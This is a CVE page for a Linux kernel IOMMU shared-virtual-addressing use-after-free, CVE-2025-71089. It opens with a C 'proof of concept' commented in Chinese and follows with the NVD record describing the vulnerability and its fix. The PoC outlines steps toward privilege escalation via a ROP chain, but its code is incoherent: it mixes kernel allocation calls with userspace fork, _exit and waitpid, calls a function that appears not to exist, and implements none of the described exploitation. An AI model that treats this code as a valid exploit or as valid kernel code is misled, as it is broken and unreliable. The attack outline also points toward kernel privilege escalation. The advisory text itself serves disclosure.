CVE-2025-71089

// CVE-2025-71089 PoC概念验证代码 // 注意：此为内核级漏洞，实际利用需要内核调试环境 #include <linux/kernel.h> #include <linux/iommu.h> #include <linux/sched.h> /* * PoC概念：触发内核页表释放后重用条件 * * 攻击步骤： * 1. 在启用了IOMMU SVA的x86系统上分配大量内存 * 2. 触发频繁的进程创建和销毁，导致页表页被频繁分配释放 * 3. 利用IOMMU缓存的过期条目访问已释放的页表页 * 4. 通过在已释放内存中布置ROP链实现权限提升 */ void trigger_page_table_reuse(void) { pid_t pids[100]; int i; // 触发大量进程创建以增加页表分配压力 for (i = 0; i < 100; i++) { pids[i] = fork(); if (pids[i] == 0) { // 子进程执行内存密集操作后退出 volatile char *buf = kmalloc(4096, GFP_KERNEL); if (buf) { memset((void *)buf, 0x41, 4096); kfree((void *)buf); } _exit(0); } } // 等待所有子进程退出，此时页表页可能被释放重用 for (i = 0; i < 100; i++) { waitpid(pids[i], NULL, 0); } /* * 此时IOMMU缓存中可能仍保留指向已释放页表页的条目 * 攻击者可利用此条件进行进一步攻击 */ } // 检测SVA是否启用 bool check_sva_enabled(void) { struct pci_dev *pdev = NULL; struct iommu_group *group; for_each_pci_dev(pdev) { group = iommu_group_get(&pdev->dev); if (group && iommu_sva_enabled()) { printk(KERN_INFO "SVA is enabled on device %s\n", dev_name(&pdev->dev)); return true; } } return false; }

{"cve": {"id": "CVE-2025-71089", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:08.583", "lastModified": "2026-04-02T09:16:20.120", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU's page tables. The x86 architecture maps the\nkernel's virtual address space into the upper portion of every process's\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU's internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\niommu: deshabilitar SVA cuando CONFIG_X86 está configurado\n\nSerie de parches 'Corrección de entradas IOTLB obsoletas para el espacio de direcciones del kernel', v7.\n\nEsto propone una corrección para una vulnerabilidad de seguridad relacionada con el Direccionamiento Virtual Compartido (SVA) de IOMMU. En un contexto SVA, un IOMMU puede almacenar en caché entradas de la tabla de páginas del kernel. Cuando una página de la tabla de páginas del kernel es liberada y reasignada para otro propósito, el IOMMU aún podría contener entradas obsoletas e incorrectas. Esto puede ser explotado para causar una condición de uso después de liberación o de escritura después de liberación, lo que podría llevar a una escalada de privilegios o a la corrupción de datos.\n\nEsta solución introduce un mecanismo de liberación diferida para las páginas de la tabla de páginas del kernel, que proporciona una ventana segura para notificar al IOMMU que invalide sus cachés antes de que la página sea reutilizada.\n\nEste parche (de 8):\n\nEn el contexto de Direccionamiento Virtual Compartido (SVA) de IOMMU, el hardware IOMMU comparte y recorre las tablas de páginas de la CPU. La arquitectura x86 mapea el espacio de direcciones virtual del kernel en la porción superior de la tabla de páginas de cada proceso. En consecuencia, en un contexto SVA, el hardware IOMMU puede recorrer y almacenar en caché entradas de la tabla de páginas del kernel.\n\nEl kernel de Linux actualmente carece de un mecanismo de notificación para los cambios en la tabla de páginas del kernel, específicamente cuando las páginas de la tabla de páginas son liberadas y reutilizadas. El controlador IOMMU solo es notificado de los cambios en las asignaciones de direcciones virtuales de usuario. Esto puede hacer que las cachés internas del IOMMU retengan entradas obsoletas para VA del kernel.\n\nLas condiciones de Uso Después de Liberación (UAF) y Escritura Después de Liberación (WAF) surgen cuando las páginas de la tabla de páginas del kernel son liberadas y posteriormente reasignadas. El IOMMU podría malinterpretar los nuevos ... (truncated)